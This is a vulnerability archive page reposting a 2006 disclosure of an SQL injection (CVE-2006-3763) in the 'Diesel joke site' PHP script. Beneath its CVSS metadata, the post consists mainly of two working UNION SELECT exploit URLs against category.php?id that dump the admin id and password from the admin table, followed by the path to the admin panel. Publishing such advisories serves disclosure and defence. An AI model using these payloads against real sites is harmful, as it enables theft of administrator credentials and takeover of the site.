Sql injection in Diesel joke site script

2006-07-25 / 2006-07-26
Credit: black code (black-cod3 hotmail com)
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-3763
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Sql injection in Diesel joke site forum type : Diesel joke site bug found by : black-code team : site-down type : Sql injection #################################################### Sql injection in Diesel joke site page : category.php variable : id #################################################### Exploits : admin id: http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,ai d,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/* pass: http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,ap ass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%2 0admin/* aid= admin id apass= pass of the admin #################################################### path to admin panel : http://www.example.com/path to jokes/admin ####################### emails: black-cod3 (at) hotmail (dot) com [email concealed] & gamr-14 (at) hotmail (dot) com [email concealed] ####################### All my respect to our friends , lezr.com , g123g.net done .. peace _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top